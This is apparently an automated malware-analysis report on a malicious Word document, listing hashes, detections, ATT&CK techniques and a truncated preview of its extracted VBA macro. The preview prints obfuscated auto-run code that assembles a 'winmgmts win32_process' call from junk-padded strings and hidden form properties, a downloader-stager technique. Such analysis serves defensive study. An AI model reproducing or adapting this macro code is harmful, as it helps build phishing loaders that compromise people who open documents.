Office (OLE) malware analysis — malicious · 2123dd4545cccb94

MALICIOUS

Office (OLE)

247.1 KB Created: 2020-08-19 12:33:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 5bcc1f57fabd675febf8c47657714f25 SHA-1: 5ad13d0223a9af582da4971dc2ccdee66dc5930c SHA-256: 2123dd4545cccb94a67f53d6b9bf1921bc8a0b0922c9e27d52e90d504abf0449

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' indicates the macros are designed to execute commands, likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Generic-9395776-0' further supports its downloader functionality. The presence of VBA macros and the likely execution of a command stager points to a spearphishing attachment delivery method.

Heuristics 7

ClamAV: Doc.Downloader.Generic-9395776-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-9395776-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15342 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15342 bytes
SHA-256: `9593eb67380f2c19deb8a545c825465b12161564a29643ebccad52b069ec68c3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Hsfggtlltgbdtcse0" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Qyiismxqrt_8hu7u.Ig_c9zmsgmz7b End Sub Attribute VB_Name = "Qyiismxqrt_8hu7u" Attribute VB_Base = "0{421A0AB0-DB6C-4B73-89D9-C1D10B7CACAD}{CB61A236-DD34-46C2-BC8F-3B7A2BEF1884}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Ig_c9zmsgmz7b() Xkm0dzym9j2psc7 = "837" If Len("Hl2pawm2rpykc2Aykvzqvd34bp23m") = Len("Oabunyqvl0wrzankg1") + 1 Then End If Len("Tishb1i_w0hw_fteBggni1k16ep2pGabvyb5_5fy5wdnwl") < Len("Xeiaunttirhw") Then MsgBox "Ghg0v0u7cqcmazodg" + "F4j6luirybe5m" MsgBox ("Fmpwpf3y3k5yfytye") MsgBox "Bd05vn7x1ekt2j" + "Hezk4zawvb0" End If If Len("Qov9_813j5oB14pyniuuv7t6om2b") = Len("K4wmjifglwbr6q") Then MsgBox "Xic7w9h4prcsbdvv" + "T2pwf1rukscxsc1q49" MsgBox ("H6quhah6g1dd !!!") MsgBox "Bc2dae3svllqfg8p" + "Bifpkelhiw97k" End If F1b6qp2c2bayo6_vqj = Qyiismxqrt_8hu7u.HelpContextId + 50 + 50 Mb5s71xgmcob0 = "635" If Len("Gj6nfam0vgnVw2hg6l6v320") = Len("Zanxyhuib0s3") + 1 Then End If Len("Hf_sryex8bqWu2eqrs8gf_0X05a3yiqduf7d") < Len("B5uc_9r4y5evr") Then MsgBox "W9fgaguzlxf" + "F14_vingqcwcab" MsgBox ("Dla7ggiugo_782ns8") MsgBox "P13ayi8iku4lcf0mpo" + "T0h_fwwwnqpcu" End If If Len("Domcey3_07y36l58I_hf0p1xobxt37s") = Len("P92wjl1t3all") Then MsgBox "Tk3q7dcnug_wq1" + "Dqgaftjocllajyo" MsgBox ("Cpix26d83q6c23a5vd !!!") MsgBox "I6kg6s8zfud41f" + "Whhd6knkj1zg" End If Wmtvod4sgoqd = ChrW(F1b6qp2c2bayo6_vqj + (15)) Cukfps788fds44i = "51" If Len("O4ej__y5m554ui_vxJwbf9lh31laykg") = Len("Dqljzwd7q4wzcnz") + 1 Then End If Len("N7mpw3p64chjVzuxio3zl06j2Imxfpbfs4920obr") < Len("Qo6txecb509rh8") Then MsgBox "E7gdtg94ihl7w8" + "A2i6mqoh0hjvl" MsgBox ("Czl7qudi90kzwx") MsgBox "Iiqfv9hjmub4y" + "Xjvxmesaagmg" End If If Len("Ukvy636x05q1s8q_mUpabzzcjs6lik5") = Len("Do_28ha5u9qf86") Then MsgBox "Bbz4u332v7vv" + "Am2txmnsqipg3" MsgBox ("Lejugpk3kurjxny !!!") MsgBox "Wlw24ig8sur1w4" + "P3glwlmpg_jbg" End If Ijztlwkgzqfn5h = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Wmtvod4sgoqd + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Qyiismxqrt_8hu7u.Vsr9ja_v24yn5 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" G9506ifjjb0s83q2wc = "914" If Len("V2d0nfjdgnrxRjvuawu87sd") = Len("Sqna5yrr1mf") + 1 Then End If Len("Zr4we084p55yW1_tj0i_9xz7Jz_fomepwu4") < Len("U8vlw7w1509r0rn8gb") Then MsgBox "C1bwh4kprt3kgguqb" + "Rm2dgjp3th9_hiu2" MsgBox ("G3lotmregbz3loam") MsgBox "N1cat3gpkdssm" + "Spsly2jgak0ah2_" End If If Len("U9y016zz1ae0G_w6s0m5cmva") = Len("S3btuqqcku6o5") Then MsgBox "T4wywk93lmg13xp1v" + "Yof8xhqytg0" MsgBox ("Tryewary_2o9qz !!!") MsgBox "Vz4yv_4qqz6gp" + "Y2358v1cxboj" End If Fzu7ik4kxno = Ww4o01pe1d0b9z8zl(Ijztlwkgzqfn5h) Erbhmd84g60ajbn = "966" If Len("T30nus5d_ozctY5qyfwybdosqo3_a_o") = Len("I9cj9azx9i0") + 1 Then End If Len("Vki8fuw83w1yv6Cce0pl0hb6uQq014f_zgg65qn") < Len("I1hoz ... (truncated)

SHA-256: 9593eb67380f2c19deb8a545c825465b12161564a29643ebccad52b069ec68c3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Hsfggtlltgbdtcse0"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Qyiismxqrt_8hu7u.Ig_c9zmsgmz7b
End Sub


Attribute VB_Name = "Qyiismxqrt_8hu7u"
Attribute VB_Base = "0{421A0AB0-DB6C-4B73-89D9-C1D10B7CACAD}{CB61A236-DD34-46C2-BC8F-3B7A2BEF1884}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Ig_c9zmsgmz7b()
   Xkm0dzym9j2psc7 = "837"
If Len("Hl2pawm2rpykc2Aykvzqvd34bp23m") = Len("Oabunyqvl0wrzankg1") + 1 Then End
If Len("Tishb1i_w0hw_fteBggni1k16ep2pGabvyb5_5fy5wdnwl") < Len("Xeiaunttirhw") Then
        MsgBox "Ghg0v0u7cqcmazodg" + "F4j6luirybe5m"
        MsgBox ("Fmpwpf3y3k5yfytye")
        MsgBox "Bd05vn7x1ekt2j" + "Hezk4zawvb0"
End If
If Len("Qov9_813j5oB14pyniuuv7t6om2b") = Len("K4wmjifglwbr6q") Then
       MsgBox "Xic7w9h4prcsbdvv" + "T2pwf1rukscxsc1q49"
       MsgBox ("H6quhah6g1dd !!!")
       MsgBox "Bc2dae3svllqfg8p" + "Bifpkelhiw97k"
End If

F1b6qp2c2bayo6_vqj = Qyiismxqrt_8hu7u.HelpContextId + 50 + 50
   Mb5s71xgmcob0 = "635"
If Len("Gj6nfam0vgnVw2hg6l6v320") = Len("Zanxyhuib0s3") + 1 Then End
If Len("Hf_sryex8bqWu2eqrs8gf_0X05a3yiqduf7d") < Len("B5uc_9r4y5evr") Then
        MsgBox "W9fgaguzlxf" + "F14_vingqcwcab"
        MsgBox ("Dla7ggiugo_782ns8")
        MsgBox "P13ayi8iku4lcf0mpo" + "T0h_fwwwnqpcu"
End If
If Len("Domcey3_07y36l58I_hf0p1xobxt37s") = Len("P92wjl1t3all") Then
       MsgBox "Tk3q7dcnug_wq1" + "Dqgaftjocllajyo"
       MsgBox ("Cpix26d83q6c23a5vd !!!")
       MsgBox "I6kg6s8zfud41f" + "Whhd6knkj1zg"
End If

Wmtvod4sgoqd = ChrW(F1b6qp2c2bayo6_vqj + (15))
   Cukfps788fds44i = "51"
If Len("O4ej__y5m554ui_vxJwbf9lh31laykg") = Len("Dqljzwd7q4wzcnz") + 1 Then End
If Len("N7mpw3p64chjVzuxio3zl06j2Imxfpbfs4920obr") < Len("Qo6txecb509rh8") Then
        MsgBox "E7gdtg94ihl7w8" + "A2i6mqoh0hjvl"
        MsgBox ("Czl7qudi90kzwx")
        MsgBox "Iiqfv9hjmub4y" + "Xjvxmesaagmg"
End If
If Len("Ukvy636x05q1s8q_mUpabzzcjs6lik5") = Len("Do_28ha5u9qf86") Then
       MsgBox "Bbz4u332v7vv" + "Am2txmnsqipg3"
       MsgBox ("Lejugpk3kurjxny !!!")
       MsgBox "Wlw24ig8sur1w4" + "P3glwlmpg_jbg"
End If

Ijztlwkgzqfn5h = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Wmtvod4sgoqd + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Qyiismxqrt_8hu7u.Vsr9ja_v24yn5 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   G9506ifjjb0s83q2wc = "914"
If Len("V2d0nfjdgnrxRjvuawu87sd") = Len("Sqna5yrr1mf") + 1 Then End
If Len("Zr4we084p55yW1_tj0i_9xz7Jz_fomepwu4") < Len("U8vlw7w1509r0rn8gb") Then
        MsgBox "C1bwh4kprt3kgguqb" + "Rm2dgjp3th9_hiu2"
        MsgBox ("G3lotmregbz3loam")
        MsgBox "N1cat3gpkdssm" + "Spsly2jgak0ah2_"
End If
If Len("U9y016zz1ae0G_w6s0m5cmva") = Len("S3btuqqcku6o5") Then
       MsgBox "T4wywk93lmg13xp1v" + "Yof8xhqytg0"
       MsgBox ("Tryewary_2o9qz !!!")
       MsgBox "Vz4yv_4qqz6gp" + "Y2358v1cxboj"
End If

Fzu7ik4kxno = Ww4o01pe1d0b9z8zl(Ijztlwkgzqfn5h)
   Erbhmd84g60ajbn = "966"
If Len("T30nus5d_ozctY5qyfwybdosqo3_a_o") = Len("I9cj9azx9i0") + 1 Then End
If Len("Vki8fuw83w1yv6Cce0pl0hb6uQq014f_zgg65qn") < Len("I1hoz
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.